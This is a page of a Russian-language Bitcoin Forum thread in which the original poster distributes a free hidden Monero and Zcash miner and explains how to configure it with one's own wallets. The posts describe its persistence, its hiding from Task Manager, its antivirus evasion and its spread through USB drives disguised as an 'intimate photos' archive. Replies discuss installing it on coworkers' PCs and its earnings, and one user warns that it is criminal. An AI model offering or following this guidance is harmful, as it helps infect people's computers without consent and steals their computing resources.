Bitcoin Forum
May 18, 2024, 03:22:09 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1] 2 3 4 5 6 7 8 9 10 11 »  All
  Print  
Author Topic: Бесплатный скрытый майнер Monero+Zcash  (Read 3344 times)
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 27, 2018, 04:52:23 PM
Last edit: April 28, 2018, 07:40:09 AM by fredsnikos
 #1

Скрытый майнер с простой настройкой.

  • Скачиваете сборку Зеркало 1 или Зеркало 2
  • Версия без вывода консольного окна с ошибкой(Кому нужно для склейки) Зеркало 1 или Зеркало 2
  • Переименовываете system64dr.sys в system64dr.zip
  • Открываете z.cnf c помощью блокнота и указываете в нем Zcash кошелёк(без рига, только кошелёк)
  • Открываете m.cnf c помощью блокнота и указываете в нем Monero кошелёк(без рига, только кошелёк)
  • При необходимости поменяйте пул в pool.cnf (по умолчанию прописан dwarfpool.com)
  • При необходимости укажите iplogger в iplog.cnf (только http! Отстукивается при установке)(Отключено из-за эвристики)
  • Сохраняем файлы в архив без пароля!
  • Переименовываете обратно system64dr.zip в system64dr.sys
Сборка готова. Майнер монеро работает с dwarfpool.com, monerohash.com - резервный. Прежде чем майнить установите минимальную выплату на dwarfpool, по умолчанию стоит 2 XMR. Либо просто пропишите нужный пул в pool.cnf Zcash майнится на flypool.org, nanopool - резервный.
Мой fee - каждый 10 запуск майнится на мой кошелёк(это 10%).

Особенности:
  • Записывается в автозагрузку
  • Сборка распространяется через флэшки.
  • Монеро майнится как на 64 так и на 32 битных системах, Zcash только 64
  • Запрет компу уходить в сон(просто гаснет экран, комп работает и майнит)
  • Нагрузка 50% ЦП и без ограничений на видеокарту
  • При открытии диспетчера майнер отключается, после закрытия сразу запускается
  • При удалении из автозагрузки, он прописывается снова.
  • Крайне сложно закрыть майнер
  • Админ права не нужны
Чищу от детекта и выкладываю новую версию регулярно.
Если сам майнер будет удалён антивирусом, то заражённый комп будет просто заражать флэшки.
Будут вопросы, пишите тут или в лс.
wolfarm
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
January 27, 2018, 09:02:21 PM
 #2

Скрытый майнер с простой настройкой.

  • Скачиваете сборку Зеркало 1 или Зеркало 2 ( пароль 123)
  • Распаковываете и через Winrar заходите в файл system64dr.sys
  • Открываете z.cnf c помощью блокнота и указываете в нем Zcash кошелёк(без рига, только кошелёк)
  • Открываете m.cnf c помощью блокнота и указываете в нем Monero кошелёк(без рига, только кошелёк)
  • Можно просто извлечь эти два файла, отредактировать и снова отправить в архив system64dr.sys, пароль ставить не нужно!
Сборка готова. Майнер монеро работает с dwarfpool.com, monerohash.com - резервный. Прежде чем майнить установите минимальную выплату на dwarfpool, по умолчанию стоит 2 XMR. Zcash майнится на flypool.org, nanopool - резервный.
Мой fee - 6 минут майнинга с каждого часа(это 10%).

Особенности:
  • Записывается в автозагрузку
  • Сборка распространяется через флэшки.
  • Монеро майнится как на 64 так и на 32 битных системах, Zcash только 64
  • Запрет компу уходить в сон
  • Нагрузка 50% ЦП и без ограничений на видеокарту
  • При открытии диспетчера майнер отключается, после закрытия сразу запускается
Сборка пока не детектится антивирусами, если сам майнер будет удалён антивирусом, то заражённый комп будет просто заражать флэшки.
Будут вопросы, пишите тут или в лс.

При открытии файла system64dr.sys открывается блокнот с иероглифами, пробовал менять кодировку - не помогает, мб че не так делаю, подскажи
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 28, 2018, 04:24:48 AM
 #3

При открытии файла system64dr.sys открывается блокнот с иероглифами, пробовал менять кодировку - не помогает, мб че не так делаю, подскажи

чтобы было проще, переименуюй system64dr.sys в system64dr.zip, отредактируй кошельки, затем верни опять system64dr.sys
bestnoobeu1
Jr. Member
*
Offline Offline

Activity: 392
Merit: 2


View Profile
January 28, 2018, 07:02:24 AM
 #4

как вылечиться от него?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 28, 2018, 07:29:35 AM
 #5

Закрываете "левый" svchost.exe, после чего удаляете его из автозагрузки.
wolfarm
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
January 28, 2018, 09:23:54 AM
 #6

Майнер монеро работает с dwarfpool.com, monerohash.com - резервный. Прежде чем майнить установите минимальную выплату на dwarfpool, по умолчанию стоит 2 XMR. Zcash майнится на flypool.org, nanopool - резервный.
Может туплю, но где это выставлять?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 28, 2018, 11:21:11 AM
 #7

Майнер монеро работает с dwarfpool.com, monerohash.com - резервный. Прежде чем майнить установите минимальную выплату на dwarfpool, по умолчанию стоит 2 XMR. Zcash майнится на flypool.org, nanopool - резервный.
Может туплю, но где это выставлять?



Начните майнить любым майнером на свой кошелёк, затем здесь http://dwarfpool.com/xmr/address?wallet=вашкошелёк введите ip с которого майните и поменяйте минимальную выплату.

Это не обязательно, потом можно просто написать им на почту.
Cap1tanM0rgan
Member
**
Offline Offline

Activity: 94
Merit: 11


View Profile
January 28, 2018, 12:06:54 PM
 #8

кто качал,как вам вариант майнера?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 28, 2018, 06:05:47 PM
 #9

Сборка обновлена (при снятии галочки в автозагрузке она появляется снова и ещё небольшие правки).
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.
mrshoo29
Member
**
Offline Offline

Activity: 336
Merit: 10


View Profile
January 28, 2018, 06:44:26 PM
 #10

Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?

▰   SEMUX   -   An innovative high-performance blockchain platform   ▰
■▬▬▬▬▬      Powered by Semux BFT consensus algorithm      ▬▬▬▬▬■
Github   -   Discord   -   Twitter   -   Telegram   -   Get Free Airdrop Now!
duckalis
Jr. Member
*
Offline Offline

Activity: 235
Merit: 5


View Profile
January 28, 2018, 07:52:53 PM
 #11

Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Да, правильно Вы понимаете. И не только на работу его надо отнести, но и распространить всюду, куда дотянутся Ваши руки. Чем больше чужих компов будет майнить для Вас, тем больше денюжек они Вам заработают.
mrshoo29
Member
**
Offline Offline

Activity: 336
Merit: 10


View Profile
January 29, 2018, 08:49:36 AM
 #12

Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Да, правильно Вы понимаете. И не только на работу его надо отнести, но и распространить всюду, куда дотянутся Ваши руки. Чем больше чужих компов будет майнить для Вас, тем больше денюжек они Вам заработают.
ну может кто откроется о результативности такой деятельности.все-таки 50% нагрузка на упаковке,в проектной организации будет заметна.особенно,когда идет работа

▰   SEMUX   -   An innovative high-performance blockchain platform   ▰
■▬▬▬▬▬      Powered by Semux BFT consensus algorithm      ▬▬▬▬▬■
Github   -   Discord   -   Twitter   -   Telegram   -   Get Free Airdrop Now!
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 29, 2018, 10:19:23 AM
 #13

Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Да, правильно Вы понимаете. И не только на работу его надо отнести, но и распространить всюду, куда дотянутся Ваши руки. Чем больше чужих компов будет майнить для Вас, тем больше денюжек они Вам заработают.
ну может кто откроется о результативности такой деятельности.все-таки 50% нагрузка на упаковке,в проектной организации будет заметна.особенно,когда идет работа

А сколько там компов?
Нагрузка расчитывается по количеству ядер. 50% это 2 ядра из 4
Могу сделать 25%
whoisdoctors
Newbie
*
Offline Offline

Activity: 392
Merit: 0


View Profile WWW
January 29, 2018, 11:11:25 AM
 #14

Установив его на комп, он будет заражать всех, кто подключал туда флешку, правильно я понял? И сколько приносят примерно 1000 машин?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 29, 2018, 11:51:07 AM
 #15

На на флешку он как бы записывает архив "интимные фото" и вот когда кто-то уже на своём компе захочет посмотреть их, майнер установится.
Ну с 1000 компов - это грубо 3000$ в месяц при круглосуточном майнинге, но 1000 набрать не просто.
Jeex
Member
**
Offline Offline

Activity: 364
Merit: 58


View Profile WWW
January 29, 2018, 03:37:19 PM
 #16

Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Смотрите, чтобы эти сволочи, не разозлились на вас и не поставили пару-тройку отметин на вашей голове Smiley Да и под статью УК такие действия очень даже вписываются. Неужели, чтобы заработать, нужно кого-то обманывать?  Grin
nadosuge
Member
**
Offline Offline

Activity: 644
Merit: 51


View Profile
January 29, 2018, 03:43:24 PM
 #17

Бугага, а потом в час Х туда подгружается ПЕТЯ и горемайнер идет вешаться
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 29, 2018, 04:18:10 PM
 #18

Я так понимаю это нужно ставить на работе,на компах коллег,чтобы пока они сволочи скролят вк .я получал денежку,а дальше больше через флешки?
Смотрите, чтобы эти сволочи, не разозлились на вас и не поставили пару-тройку отметин на вашей голове Smiley Да и под статью УК такие действия очень даже вписываются. Неужели, чтобы заработать, нужно кого-то обманывать?  Grin

Какая статья и состав преступления? Интересно представить как вася иванов идёт в отделение и пишет заявление, что на его компьютере какая-то программа работает и забирает много ресурсов))
Sv9t
Jr. Member
*
Offline Offline

Activity: 294
Merit: 3


View Profile WWW
January 29, 2018, 06:13:11 PM
 #19

Тут уже был похожий майнер, на фотку ставился. А он по сети не заражает пк? к примеру которые в локалке находятся. И если из 100 ПК, только 20 с выходом в инет, есть ли возможность использовать ресурсы всех ПК, а не только тех , которые имеют доступ в инет?
fredsnikos (OP)
Newbie
*
Offline Offline

Activity: 95
Merit: 0


View Profile
January 30, 2018, 04:26:38 AM
 #20

Тут уже был похожий майнер, на фотку ставился. А он по сети не заражает пк? к примеру которые в локалке находятся. И если из 100 ПК, только 20 с выходом в инет, есть ли возможность использовать ресурсы всех ПК, а не только тех , которые имеют доступ в инет?
Нет, с локалкой не работает и нужен интернет.
Pages: [1] 2 3 4 5 6 7 8 9 10 11 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!